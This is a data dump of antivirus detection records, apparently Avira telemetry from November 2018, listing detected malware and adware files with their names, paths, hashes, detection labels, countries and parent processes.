  Row(detection=Row(filename='avscan-20181102-052711-eb2e873c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052711-EB2E873C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054932-0a686886', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054932-0A686886', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055307-8ac9318a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055307-8AC9318A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052804-0ab04657', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052804-0AB04657', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062135-84f2109f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062135-84F2109F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062534-139cbddf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062534-139CBDDF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061113-12332865', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061113-12332865', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055044-3551feaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055044-3551FEAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062147-8be0360d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062147-8BE0360D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061511-a023dfd1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061511-A023DFD1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062624-30ebb1bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062624-30EBB1BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062644-3ce214b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062644-3CE214B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054117-e3954703', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054117-E3954703', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055112-468ac56c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055112-468AC56C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054311-2786b044', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054311-2786B044', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060256-ea02e614', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060256-EA02E614', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060104-a71f7333', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060104-A71F7333', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060602-58929f12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060602-58929F12', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055843-53504bb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055843-53504BB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:50:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051946-e23e39d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051946-E23E39D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061514-a212a579', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061514-A212A579', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050803-3f46b8a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050803-3F46B8A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='debit note mhl 4 (xe 16c).exe', filepath='F:\\\xa0\\DEBIT NOTE MHL 4 (xe 16c).exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8885f4d0a3a7781ade15069f9785a9b889dbb9049dfccf2664b0f3b6410a71e9', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T01:15:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:21:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060936-d84e4994', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060936-D84E4994', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062432-ee4dbbd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062432-EE4DBBD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:22:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051129-b9ec18b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051129-B9EC18B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051406-17839c15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051406-17839C15', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060145-bf7ff873', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060145-BF7FF873', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-155424-33deee6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155424-33DEEE6C', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bkpurchase.exe', filepath='D:\\BKAssets 25-10-2011\\BKPurchase.exe', filesize=1600000, name='TR/Dropper.MSIL.Gen.#M300.#R5091'), hash='2bd3883330f42fee417e6eb8d2456010cd6b14bd7ab07ba494706b2da76e57e4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:53:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:00:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154827-75701709', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154827-75701709', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh1b85', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH1B85', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:41:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='0de2186f822b93d071a20fe2c6b0ab283b0d6c90f1c280e34ab915fca0cb8028', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:14:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152414-378c8688', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152130-20B7880B\\AVSCAN-20181101-152414-378C8688', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7071800\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155924-e42d6ee8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155924-E42D6EE8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160053-f313cc1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160053-F313CC1C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9143283\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:aYJvfBrnHVJ\\\\\\/n3hkq\\\\\\/s \\\\\\/mnl', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\installer_microsoft_excel (1).exe', parentsize=2526136, timestamp='2018-11-01T18:19:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183216-d7532ab5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9657736d\\AVSCAN-20181101-183030-CE07F73F\\AVSCAN-20181101-183216-D7532AB5', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182102-35b5b008', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8385e50e\\AVSCAN-20181101-182043-3346EDBA\\AVSCAN-20181101-182102-35B5B008', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='terakhir.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\FD PAK HERMAN\\hari terakhir\\terakhir.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe659_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe659 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T21:25:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hosts-bg.exe', filepath='H:\\Program Files\\hosts\\hosts-bg.exe', filesize=896000, name='ADWARE/CrossRider.Gen2.#M300.#R101244'), hash='043263a827d1399a6a67c283c2dae406a399f7e976a95c897b20a5d70cefcd06', metadata=Row(cmdline='\\\\\\/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=19360, timestamp='2018-11-01T04:44:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195946-226cc217', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181031-205810-8E73B4A7\\AVSCAN-20181101-195946-226CC217', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:55:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-08-06-45.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-01T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T11:45:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:05:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jun0312.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\SORE\\JUN0312\\JUN0312.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:01Z'), dt=datetime.date(2018, 11, 1)),
